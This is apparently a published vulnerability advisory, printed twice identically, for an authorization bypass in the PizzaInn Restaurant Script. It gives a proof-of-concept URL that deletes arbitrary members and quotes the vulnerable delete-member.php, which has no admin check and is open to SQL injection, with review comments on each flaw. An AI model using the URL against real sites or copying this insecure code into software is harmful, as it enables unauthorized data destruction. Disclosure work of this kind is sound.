##############################################################
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authorization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: 55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
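#1-) Users can be deleted without admin privileges.
#2-) Members can be deleted without any session check: delete-member.php (listed below) calls session_start() but never verifies that the requester is a logged-in admin.
#3-) The user is deleted as soon as the URL below is requested: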
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# // delete-member.php as quoted by the advisory: deletes the `members` row whose
# // member_id equals the `id` query parameter, then redirects to accounts.php.
# // NOTE(review): nothing in this listing reads $_SESSION or otherwise checks who
# // is making the request; that missing check is the authorization bypass reported above.
# //Start session
# session_start();
# // NOTE(review): an admin-session check belongs here, before any database work,
# // ending the request when it fails. The session key set at login is not shown on this page.
#
# //checking connection and connecting to a database
# // presumably defines DB_HOST, DB_USER, DB_PASSWORD and DB_DATABASE — confirm against connection/config.php
# require_once('connection/config.php');
# //Connect to mysql server
# // NOTE(review): the mysql_* extension was removed in PHP 7.0; mysqli or PDO are the replacements.
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# // Sends the raw driver error text to the client; logging it server-side would avoid disclosing it.
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# // NOTE(review): a destructive action is triggered by a plain GET request; a POST
# // with an anti-CSRF token is the usual safeguard, in addition to the missing admin check.
# if (isset($_GET['id']))
# {
# // get id value
# // The request value is used as-is: no type check, cast or escaping.
# $id = $_GET['id'];
#
# // delete the entry
# // NOTE(review): $id is interpolated directly into the SQL text. Validate it as an
# // integer and bind it through a prepared statement (mysqli/PDO) instead.
# // mysql_query() returns false only on a query error; a DELETE that matches no
# // rows still succeeds, so the die() message below does not indicate a missing member.
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# // NOTE(review): the header name is printed as "Loca tion" (with a space), which is
# // not a valid redirect header; likely an artifact of how this page was published,
# // presumably "Location" in the project file — verify against the upstream source.
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# // Same header-name caveat as the redirect above.
# header("loca tion: accounts.php");
# }
#
# ?>
#################################################################
#Exploit Title: PizzaInn Restaurant Script Project Delete Member Authorization Bypass
#Date: 29.01.2018
#Exploit Author: 55utd55
#Author Web: 55utd55.com
#Author Social: 55utd55_tht
#Software Link: https://sourceforge.net/projects/restaurantmis/
#Tested On: Kali linux 2.0 & Windows 7
#
#Proof Of Concept:
#--------------------------
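#1-) Users can be deleted without admin privileges.
#2-) Members can be deleted without any session check: delete-member.php (listed below) calls session_start() but never verifies that the requester is a logged-in admin.
#3-) The user is deleted as soon as the URL below is requested: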
#http://domain/admin/delete-member.php?id=[member_id]
#
#
#
#delete-member.php
#---------------------------
#
#<?php
# // delete-member.php as quoted by the advisory: deletes the `members` row whose
# // member_id equals the `id` query parameter, then redirects to accounts.php.
# // NOTE(review): nothing in this listing reads $_SESSION or otherwise checks who
# // is making the request; that missing check is the authorization bypass reported above.
# //Start session
# session_start();
# // NOTE(review): an admin-session check belongs here, before any database work,
# // ending the request when it fails. The session key set at login is not shown on this page.
#
# //checking connection and connecting to a database
# // presumably defines DB_HOST, DB_USER, DB_PASSWORD and DB_DATABASE — confirm against connection/config.php
# require_once('connection/config.php');
# //Connect to mysql server
# // NOTE(review): the mysql_* extension was removed in PHP 7.0; mysqli or PDO are the replacements.
# $link = mysql_connect(DB_HOST, DB_USER, DB_PASSWORD);
# if(!$link) {
# // Sends the raw driver error text to the client; logging it server-side would avoid disclosing it.
# die('Failed to connect to server: ' . mysql_error());
# }
#
# //Select database
# $db = mysql_select_db(DB_DATABASE);
# if(!$db) {
# die("Unable to select database");
# }
#
# // check if the 'id' variable is set in URL
# // NOTE(review): a destructive action is triggered by a plain GET request; a POST
# // with an anti-CSRF token is the usual safeguard, in addition to the missing admin check.
# if (isset($_GET['id']))
# {
# // get id value
# // The request value is used as-is: no type check, cast or escaping.
# $id = $_GET['id'];
#
# // delete the entry
# // NOTE(review): $id is interpolated directly into the SQL text. Validate it as an
# // integer and bind it through a prepared statement (mysqli/PDO) instead.
# // mysql_query() returns false only on a query error; a DELETE that matches no
# // rows still succeeds, so the die() message below does not indicate a missing member.
# $result = mysql_query("DELETE FROM members WHERE member_id='$id'")
# or die("The member does not exist ... \n");
#
# // redirect back to the accounts page
# // NOTE(review): the header name is printed as "Loca tion" (with a space), which is
# // not a valid redirect header; likely an artifact of how this page was published,
# // presumably "Location" in the project file — verify against the upstream source.
# header("Loca tion: accounts.php");
# }
# else
# // if id isn't set, redirect back to the accounts page
# {
# // Same header-name caveat as the redirect above.
# header("loca tion: accounts.php");
# }
#
# ?>
#################################################################